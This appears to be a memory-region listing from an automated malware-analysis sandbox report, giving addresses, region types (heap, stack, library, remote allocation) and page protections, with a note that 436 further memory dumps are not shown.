| 70DE000 | unknown | page read and write |
| 6DE000 | stack | page read and write |
| 7E5E000 | unknown | page read and write |
| 85E0000 | trusted library allocation | page read and write |
| 33E5000 | unknown | page execute and read and write |
| 7C30000 | unknown | page read and write |
| 154D18A0000 | trusted library allocation | page read and write |
| 8C60000 | unknown | page execute and read and write |
| 154D18A4000 | trusted library allocation | page read and write |
| 154CC45B000 | heap | page read and write |
| 154D1930000 | trusted library allocation | page read and write |
| 154CD260000 | trusted library section | page readonly |
| 8BAA000 | unknown | page read and write |
| 79B7000 | unknown | page read and write |
| 154CC4B2000 | heap | page read and write |
| 7D9C000 | unknown | page read and write |
| 2DC8000 | stack | page read and write |
| 154D1C00000 | remote allocation | page read and write |
| 276F779000 | stack | page read and write |
| 594B000 | unknown | page read and write |
| 42C000 | unknown | page read and write |
| 154CD270000 | trusted library section | page readonly |
| 27703FE000 | stack | page read and write |
| 3170000 | heap | page read and write |
| 83A9000 | unknown | page read and write |
| 6C5000 | heap | page read and write |
| 7A10000 | unknown | page read and write |
| 154D19B0000 | trusted library allocation | page read and write |
| 33E0000 | unknown | page read and write |
| 7A60000 | unknown | page read and write |
| 154D1A00000 | heap | page read and write |
| 7330000 | unknown | page read and write |
| 349E000 | stack | page read and write |
| 6BF000 | heap | page read and write |
| DABA000 | unknown | page execute and read and write |
| 277087B000 | stack | page read and write |
| 7C40000 | unknown | page read and write |
| 4C10000 | heap | page execute and read and write |
| 2E44000 | unknown | page read and write |
| 154D1B04000 | heap | page read and write |
| 282E000 | stack | page read and write |
| 7AEE000 | unknown | page read and write |
| 9EBA000 | unknown | page execute and read and write |
| 154CC4B8000 | heap | page read and write |
| 7F20000 | unknown | page execute and read and write |
| 33E2000 | unknown | page read and write |
| 8710000 | unknown | page read and write |
| 276F37E000 | unknown | page readonly |
| 27701FE000 | stack | page read and write |
| 8760000 | unknown | page read and write |
| 6D5000 | heap | page read and write |
| 5D0000 | heap | page read and write |
| 154D1AF3000 | heap | page read and write |
| 27AE000 | stack | page read and write |
| 7BC0000 | unknown | page read and write |
| 7BE0000 | unknown | page read and write |
| 2FCD000 | stack | page read and write |
| 154CD240000 | trusted library section | page readonly |
| 277057E000 | unknown | page readonly |
| 154CCD02000 | heap | page read and write |
| 51F6000 | unknown | page read and write |
| 8640000 | unknown | page execute and read and write |
| 8BB2000 | unknown | page read and write |
| 154CC48E000 | heap | page read and write |
| 276F277000 | stack | page read and write |
| 7E1C000 | unknown | page read and write |
| 27AF000 | stack | page read and write |
| 276F87E000 | unknown | page readonly |
| 154CD290000 | trusted library section | page readonly |
| 8660000 | unknown | page read and write |
| 154D19A0000 | trusted library allocation | page read and write |
| 33D0000 | unknown | page read and write |
| 7C10000 | unknown | page read and write |
| 33C9000 | unknown | page read and write |
| 78FC000 | unknown | page read and write |
| 4C5E000 | unknown | page read and write |
| 7240000 | unknown | page write copy |
| 7916000 | unknown | page read and write |
| 2E23000 | unknown | page read and write |
| 31A9000 | heap | page read and write |
| 154D17D0000 | trusted library allocation | page read and write |
| 7905000 | unknown | page read and write |
| 401000 | unknown | page execute read |
| 3040000 | heap | page read and write |
| 719E000 | unknown | page read and write |
| 154CC3C0000 | trusted library section | page read and write |
| 2E4D000 | unknown | page read and write |
| 5C0000 | heap | page read and write |
| 154D1AFC000 | heap | page read and write |
| 79AD000 | unknown | page read and write |
| 778F000 | unknown | page read and write |
| 6253000 | unknown | page read and write |
| 2770EFE000 | stack | page read and write |
| 7360000 | unknown | page read and write |
| 154D1AED000 | heap | page read and write |
| 870E000 | unknown | page read and write |
| 78C0000 | unknown | page read and write |
| 3120000 | heap | page read and write |
| 2E3B000 | unknown | page read and write |
| 154CCC00000 | heap | page read and write |
| 624D000 | unknown | page read and write |
| 7AAE000 | unknown | page read and write |
| 154D1B0A000 | heap | page read and write |
| 154D1A41000 | heap | page read and write |
| 33C0000 | unknown | page read and write |
| 3360000 | unknown | page read and write |
| 7B6D000 | unknown | page read and write |
| 154D18C9000 | trusted library allocation | page read and write |
| 7300000 | unknown | page read and write |
| 3380000 | unknown | page read and write |
| 8563000 | unknown | page execute and read and write |
| 84F0000 | unknown | page execute and read and write |
| 8A44000 | unknown | page read and write |
| 276FF7E000 | unknown | page readonly |
| 98000 | stack | page read and write |
| 5945000 | unknown | page read and write |
| 3515000 | heap | page read and write |
| 154D1A54000 | heap | page read and write |
| 276EC9B000 | stack | page read and write |
| 154CCD13000 | heap | page read and write |
| 64E000 | stack | page read and write |
| 774E000 | unknown | page read and write |
| 34A0000 | heap | page read and write |
| 8920000 | unknown | page read and write |
| 8910000 | unknown | page read and write |
| 43D000 | stack | page read and write |
| 5E8000 | heap | page read and write |
| 331D000 | unknown | page read and write |
| 277017E000 | unknown | page readonly |
| 4D50000 | heap | page read and write |
| 154CC4FE000 | heap | page read and write |
| 19D000 | stack | page read and write |
| 154D1C00000 | remote allocation | page read and write |
| 3770000 | heap | page read and write |
| 460000 | heap | page read and write |
| 32C1000 | unknown | page readonly |
| 6B5000 | heap | page read and write |
| 78E0000 | unknown | page execute and read and write |
| 154D1A60000 | heap | page read and write |
| 4C90000 | heap | page read and write |
| 7510000 | unknown | page read and write |
| 8D3E000 | unknown | page read and write |
| 42A000 | unknown | page read and write |
| 2550000 | heap | page read and write |
| 4C0000 | heap | page read and write |
| 7E9D000 | unknown | page read and write |
| 80C6000 | unknown | page execute and read and write |
| 610E000 | unknown | page read and write |
| 154CC43F000 | heap | page read and write |
| 87C0000 | unknown | page execute and read and write |
| 154CCD1A000 | heap | page read and write |
| 72B0000 | unknown | page read and write |
| 2770F7E000 | unknown | page readonly |
| 154CC2A0000 | heap | page read and write |
| 2E3E000 | unknown | page read and write |
| 276FEFE000 | stack | page read and write |
| 8C40000 | unknown | page execute and read and write |
| 89BC000 | unknown | page read and write |
| 154CC380000 | heap | page read and write |
| 154CD280000 | trusted library section | page readonly |
| AD5000 | heap | page read and write |
| 154CC48C000 | heap | page read and write |
| 24F0000 | heap | page read and write |
| 854D000 | unknown | page execute and read and write |
| 408000 | unknown | page readonly |
| 33BD000 | unknown | page execute and read and write |
| 5D5000 | heap | page read and write |
| 8630000 | unknown | page read and write |
| 73B0000 | unknown | page read and write |
| 94BA000 | unknown | page execute and read and write |
| 7B80000 | unknown | page execute and read and write |
| 154CC495000 | heap | page read and write |
| BCBA000 | unknown | page execute and read and write |
| 7D5E000 | unknown | page read and write |
| A8BA000 | unknown | page execute and read and write |
| 5943000 | unknown | page read and write |
| 401000 | unknown | page execute read |
| 7D1B000 | unknown | page read and write |
| 3390000 | unknown | page read and write |
| 4B0000 | heap | page read and write |
| 2554000 | heap | page read and write |
| 316E000 | unknown | page read and write |
| 8730000 | unknown | page execute and read and write |
| 8D7D000 | unknown | page read and write |

436 additional memdumps are not shown in this listing.